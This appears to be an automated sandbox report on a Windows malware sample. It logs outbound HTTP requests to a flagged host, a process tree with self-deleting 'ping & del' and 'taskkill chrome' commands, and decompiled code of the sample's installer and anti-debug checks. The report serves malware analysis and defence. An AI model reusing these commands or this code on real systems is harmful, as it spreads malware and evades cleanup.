                                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Bse97EGGSaytld%2Fav3Pgmf%2B18O%2BIt7f88xMJcod8oSLhKGoRSsXmMRHaN%2F39d9%2BYlNFVb%2FCecXsoRyqsz1O1dCTs4G7NjVqLqc4FnHnyRpd22SyTsg%3D%3D"}],"max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7d30eff5439-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Ed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49728 | 104.21.6.78 | 80 | C:\Users\user\Desktop\IpB8f8qwze.exe
Timestamp | kBytes transferred | Direction | Data
Mar 7, 2021 19:21:38.209012032 CET | 1425 | OUT | GET /info_old/ddd HTTP/1.1
                                                                                                                                                                Host: 9A3A97F6F45F2C2B.com
                                                                                                                                                                Accept: */*
Mar 7, 2021 19:21:38.272218943 CET | 1426 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:38 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d88a8571ca2a9f3ca91ec4d31a5524beb1615141298; expires=Tue, 06-Apr-21 18:21:38 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af857844000053a9cd952000000001
                                                                                                                                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UNSHevcQH8s2YPGlIodCY3YD2BjX22U4EY34et8cBAn3STdJBry5lo1U4DBMYdCQctZgm8l%2BPovA16d1Ck3yTzVm0XUdG%2FwRZMNQ8Fpx%2F0aHys6Sfg%3D%3D"}],"max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d83a0fa553a9-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chr


                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:03
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\Desktop\IpB8f8qwze.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\Desktop\IpB8f8qwze.exe'
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:4882440 bytes
                                                                                                                                                                MD5 hash:1B59FC1A89C1BC88EA4E1B26DA579120
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000000.00000002.258774447.00000000027B0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:07
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                                Imagebase:0x140000
                                                                                                                                                                File size:59904 bytes
                                                                                                                                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:09
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 0011 user01
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:4882440 bytes
                                                                                                                                                                MD5 hash:1B59FC1A89C1BC88EA4E1B26DA579120
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000002.00000002.310468368.0000000002720000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 19%, Metadefender, Browse
                                                                                                                                                                • Detection: 38%, ReversingLabs
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:08
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0E9F5C63C593DB0A234ED10779F63A5A C
                                                                                                                                                                Imagebase:0x140000
                                                                                                                                                                File size:59904 bytes
                                                                                                                                                                MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:10
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe 200 user01
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:4882440 bytes
                                                                                                                                                                MD5 hash:1B59FC1A89C1BC88EA4E1B26DA579120
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.275254387.0000000002650000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:13
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\IpB8f8qwze.exe'
                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:13
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:14
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                Imagebase:0x1130000
                                                                                                                                                                File size:18944 bytes
                                                                                                                                                                MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:16
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\1615173766196.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:'C:\Users\user\AppData\Roaming\1615173766196.exe' /sjson 'C:\Users\user\AppData\Roaming\1615173766196.txt'
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:103632 bytes
                                                                                                                                                                MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:17
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:18
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:21
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:taskkill /f /im chrome.exe
                                                                                                                                                                Imagebase:0x13a0000
                                                                                                                                                                File size:74752 bytes
                                                                                                                                                                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:21
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
                                                                                                                                                                Imagebase:0x150000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:22
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:22
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                Imagebase:0x1130000
                                                                                                                                                                File size:18944 bytes
                                                                                                                                                                MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:31
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                                Imagebase:0x1140000
                                                                                                                                                                File size:73160 bytes
                                                                                                                                                                MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 3%, Metadefender, Browse
                                                                                                                                                                • Detection: 2%, ReversingLabs

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:38
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'
                                                                                                                                                                Imagebase:0xbc0000
                                                                                                                                                                File size:232960 bytes
                                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:38
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                General

                                                                                                                                                                Start time:19:21:39
                                                                                                                                                                Start date:07/03/2021
                                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                                Imagebase:0xa20000
                                                                                                                                                                File size:18944 bytes
                                                                                                                                                                MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis


                                                                                                                                                                  Executed Functions

                                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                                  			E10020600(void* __ebx, void* __edi, void* __eflags) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v311;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				char _v575;
                                                                                                                                                                  				char _v576;
                                                                                                                                                                  				long _v580;
                                                                                                                                                                  				intOrPtr _v584;
                                                                                                                                                                  				intOrPtr _v588;
                                                                                                                                                                  				intOrPtr _v592;
                                                                                                                                                                  				intOrPtr _v596;
                                                                                                                                                                  				intOrPtr _v600;
                                                                                                                                                                  				intOrPtr _v604;
                                                                                                                                                                  				intOrPtr _v608;
                                                                                                                                                                  				intOrPtr _v612;
                                                                                                                                                                  				intOrPtr _v616;
                                                                                                                                                                  				intOrPtr _v620;
                                                                                                                                                                  				intOrPtr _v624;
                                                                                                                                                                  				intOrPtr _v628;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  				int _t47;
                                                                                                                                                                  				void* _t56;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				int _t62;
                                                                                                                                                                  				intOrPtr _t73;
                                                                                                                                                                  				int _t75;
                                                                                                                                                                  				int _t77;
                                                                                                                                                                  				void* _t101;
                                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                                  				void* _t108;
                                                                                                                                                                  				void* _t109;
                                                                                                                                                                  				void* _t111;
                                                                                                                                                                  				intOrPtr _t114;
                                                                                                                                                                  				void* _t115;
                                                                                                                                                                  				intOrPtr _t116;
                                                                                                                                                                  				intOrPtr _t118;
                                                                                                                                                                  				intOrPtr _t120;
                                                                                                                                                                  				void* _t125;
                                                                                                                                                                  
                                                                                                                                                                  				_t125 = __eflags;
                                                                                                                                                                  				_t100 = __edi;
                                                                                                                                                                  				_t82 = __ebx;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E100233D5);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t104;
                                                                                                                                                                  				_push(_t101);
                                                                                                                                                                  				E1001FDA0();
                                                                                                                                                                  				_v312 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v311, 0, 0x103);
                                                                                                                                                                  				GetModuleFileNameA(0,  &_v312, 0x104);
                                                                                                                                                                  				E1001A660(__ebx, _t100, _t101, _t125,  &_v44); // executed
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t46 = E10001A50( &_v312, E100011E0( &_v44));
                                                                                                                                                                  				_t108 = _t104 - 0x264 + 0x18;
                                                                                                                                                                  				_t126 = _t46;
                                                                                                                                                                  				if(_t46 == 0) {
                                                                                                                                                                  					_t47 = E1001A150("Global\\exist_sign__install_r3"); // executed
                                                                                                                                                                  					_t109 = _t108 + 4;
                                                                                                                                                                  					__eflags = _t47;
                                                                                                                                                                  					if(_t47 == 0) {
                                                                                                                                                                  						_v576 = 0;
                                                                                                                                                                  						E1000CF80(_t100,  &_v575, 0, 0x103);
                                                                                                                                                                  						GetTempPathA(0x104,  &_v576);
                                                                                                                                                                  						E1000CDB3( &_v576,  &_v576, 0x104, E100011E0( &_v44));
                                                                                                                                                                  						_t111 = _t109 + 0x18;
                                                                                                                                                                  						CopyFileA( &_v312,  &_v576, 0); // executed
                                                                                                                                                                  						_v580 = GetTickCount();
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							_t56 = E1001A1D0( &_v312); // executed
                                                                                                                                                                  							_t102 = _t56;
                                                                                                                                                                  							_t57 = E1001A1D0( &_v576); // executed
                                                                                                                                                                  							_t111 = _t111 + 8;
                                                                                                                                                                  							__eflags = _t56 - _t57;
                                                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							Sleep(0x3e8);
                                                                                                                                                                  							__eflags = GetTickCount() - _v580 - 0x7530;
                                                                                                                                                                  							if(__eflags <= 0) {
                                                                                                                                                                  								continue;
                                                                                                                                                                  							} else {
                                                                                                                                                                  							}
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						E1001FE40(); // executed
                                                                                                                                                                  						E10020020(_t82, _t100, _t102, __eflags, "install", "user01", "-0.1", "51.0", "exe"); // executed
                                                                                                                                                                  						_t114 = _t111 + 0x14 - 0x1c;
                                                                                                                                                                  						_t89 = _t114;
                                                                                                                                                                  						_v588 = _t114;
                                                                                                                                                                  						_v612 = E10001160(_t114, __eflags, "status=main_start");
                                                                                                                                                                  						E100202C0(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                  						_t115 = _t114 + 0x1c;
                                                                                                                                                                  						_t62 = PathFileExistsA("C:\\hijack"); // executed
                                                                                                                                                                  						__eflags = _t62;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							L15:
                                                                                                                                                                  							_t116 = _t115 - 0x1c;
                                                                                                                                                                  							_v592 = _t116;
                                                                                                                                                                  							_v616 = E10001160(_t116, __eflags, "status=check_debug");
                                                                                                                                                                  							E100202C0(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                  							_t118 = _t116 + 0x1c - 0x1c;
                                                                                                                                                                  							_v596 = _t118;
                                                                                                                                                                  							_v620 = E10001160(_t118, __eflags, "user01");
                                                                                                                                                                  							E1001FF30(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                  							_t120 = _t118 + 0x1c - 0x1c;
                                                                                                                                                                  							_v600 = _t120;
                                                                                                                                                                  							_v624 = E10001160(_t120, __eflags, "user01");
                                                                                                                                                                  							E1001FE50(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                  							_v604 = _t120 + 0x1c - 0x1c;
                                                                                                                                                                  							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
                                                                                                                                                                  							E100202C0(_t82, _t100, _t102, __eflags); // executed
                                                                                                                                                                  						} else {
                                                                                                                                                                  							E1001A100(); // executed
                                                                                                                                                                  							_t75 = E1001A110(_t89); // executed
                                                                                                                                                                  							__eflags = _t75;
                                                                                                                                                                  							if(_t75 == 0) {
                                                                                                                                                                  								L12:
                                                                                                                                                                  							} else {
                                                                                                                                                                  								__eflags = E10019D70();
                                                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                                                  									_t77 = E1001FA90(_t82, _t100, _t102, __eflags, 0x3e8, 0); // executed
                                                                                                                                                                  									_t115 = _t115 + 8;
                                                                                                                                                                  									__eflags = _t77;
                                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                                  										goto L15;
                                                                                                                                                                  									} else {
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									goto L12;
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  					}
                                                                                                                                                                  					E1001A2C0(); // executed
                                                                                                                                                                  					_v608 = 1;
                                                                                                                                                                  					_v8 = 0xffffffff;
                                                                                                                                                                  					E100011A0( &_v44);
                                                                                                                                                                  					_t73 = _v608;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					E10020BC0(__ebx, _t100, _t101, _t126, "51.0");
                                                                                                                                                                  					_v584 = 1;
                                                                                                                                                                  					_v8 = 0xffffffff;
                                                                                                                                                                  					E100011A0( &_v44);
                                                                                                                                                                  					_t73 = _v584;
                                                                                                                                                                  				}
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _t73;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 10020639
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002064F
                                                                                                                                                                    • Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                    • Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName_memset$_sprintf
                                                                                                                                                                  • String ID: -0.1$51.0$51.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
                                                                                                                                                                  • API String ID: 3079340674-877224509
                                                                                                                                                                  • Opcode ID: 77969cf0e0067dbf4ab6fa18ef71977aa024843d5ddcc2f32c7ae2d892fc3bab
                                                                                                                                                                  • Instruction ID: 4ca8eb26ed237a7cbfddb670d92fde38fcb821bcdd61c2f7abf1832b517c0666
                                                                                                                                                                  • Opcode Fuzzy Hash: 77969cf0e0067dbf4ab6fa18ef71977aa024843d5ddcc2f32c7ae2d892fc3bab
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E51C2B9D003089BEB10FBA4DC4ABDD7675EB10344F4401A5FA0966183EF71BB84CBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 52%
                                                                                                                                                                  			E1001F780(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				char* _v16;
                                                                                                                                                                  				BYTE* _v20;
                                                                                                                                                                  				int _v24;
                                                                                                                                                                  				int _v28;
                                                                                                                                                                  				int _v32;
                                                                                                                                                                  				int _v36;
                                                                                                                                                                  				char _v299;
                                                                                                                                                                  				char _v300;
                                                                                                                                                                  				char _v563;
                                                                                                                                                                  				char _v564;
                                                                                                                                                                  				signed int _v568;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				BYTE* _t66;
                                                                                                                                                                  				int _t69;
                                                                                                                                                                  				int _t70;
                                                                                                                                                                  				int _t71;
                                                                                                                                                                  				long _t72;
                                                                                                                                                                  				int _t75;
                                                                                                                                                                  				signed int _t90;
                                                                                                                                                                  				void* _t120;
                                                                                                                                                                  				void* _t121;
                                                                                                                                                                  				void* _t122;
                                                                                                                                                                  				void* _t123;
                                                                                                                                                                  				void* _t124;
                                                                                                                                                                  				void* _t127;
                                                                                                                                                                  
                                                                                                                                                                  				_t119 = __esi;
                                                                                                                                                                  				_t118 = __edi;
                                                                                                                                                                  				_t91 = __ebx;
